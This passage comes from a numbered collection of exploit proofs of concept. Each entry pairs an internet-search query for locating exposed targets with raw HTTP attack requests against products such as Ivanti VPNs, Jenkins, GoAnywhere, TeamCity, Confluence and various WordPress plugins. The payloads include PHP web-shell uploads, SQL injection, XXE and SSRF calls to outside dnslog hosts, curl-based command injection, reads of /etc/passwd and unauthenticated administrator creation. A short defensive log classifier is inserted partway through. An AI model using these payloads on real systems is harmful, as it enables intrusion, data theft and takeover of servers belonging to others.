POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The download side of the session returns the file contents inside the CLI error message:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

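Added example (not part of the original post or of any vendor's code): a small Python classifier, run over constructed access-log lines, that flags the request shapes recurring in entries 91, 95, 105 to 108, 110 and 111 to 117 above, so a defender can triage web logs for them. The log lines, rule names and host names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (assumption, not from the page's targets);
# the request targets mirror the shapes collected in the entries above.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jun/2024:10:00:01 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../etc/passwd HTTP/1.1" 200 1810
10.0.0.6 - - [05/Jun/2024:10:00:02 +0800] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 55
10.0.0.7 - - [05/Jun/2024:10:00:03 +0800] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 4201
10.0.0.8 - - [05/Jun/2024:10:00:04 +0800] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 312
10.0.0.9 - - [05/Jun/2024:10:00:05 +0800] "GET /api/file/formimage HTTP/1.1" 200 120
10.0.0.9 - - [05/Jun/2024:10:00:06 +0800] "GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fexample.invalid HTTP/1.1" 200 88
"""

# Rule name -> regex, applied to the percent-decoded request target.
# Order matters: hits are reported in this order.
RULES = {
    # A ';' inside a path segment (e.g. "..;/" or "xmlrpc;/") is the Tomcat
    # path-parameter trick used to slip past path-based access control.
    "semicolon-path-segment": re.compile(r"/[^/?]*;[^/?]*/"),
    # ".." as a whole segment, in the path or in a query value.
    "dot-dot-traversal": re.compile(r"(?:^|[/\\])\.\.(?:[/\\;]|$)"),
    # MySQL error-based injection primitives.
    "error-based-sqli": re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    # Time-based injection primitive.
    "time-based-sqli": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    # A URL-valued parameter pointing at an external or file:// resource.
    "ssrf-url-param": re.compile(r"[?&](?:url|link)=(?:https?|file|ftp)://", re.I),
}

# Combined-log request line: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalize_target(target):
    """Percent-decode twice so double-encoded payloads are matched as well."""
    return unquote(unquote(target))


def classify(line):
    """Return the list of rule names that match one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    target = normalize_target(m.group("target"))
    return [name for name, rx in RULES.items() if rx.search(target)]


def scan(log_text):
    """Return (1-based line number, matched rules) for every flagged line."""
    return [
        (n, hits)
        for n, line in enumerate(log_text.splitlines(), 1)
        if (hits := classify(line))
    ]


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```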
118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the SQL statement base64-encoded (not encrypted): sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The output of the executed command is returned in the X-Cmd-Response response header.

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then served from http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; from there system commands can be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The dot segments must reach the server unnormalized; most HTTP clients collapse them before sending (use a raw socket, or curl --path-as-is).

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

A DNS query for the entity host on the DNSLog side confirms that the parser resolves external entities.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected versions: Adobe ColdFusion 2018 Update 17 and earlier, 2021 Update 7 and earlier, 2023 Update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

Note that the PHP file is declared as image/png: the uploader trusts the declared Content-Type rather than the file name or content.

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

The request creates a new user with the SYSTEM_ADMIN role without authentication: a non-existent path plus the jsp parameter ending in ;.jsp reaches the internal REST endpoint.

CVE-2024-27199 (path traversal to authenticated pages):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Exploit script: CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected versions: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
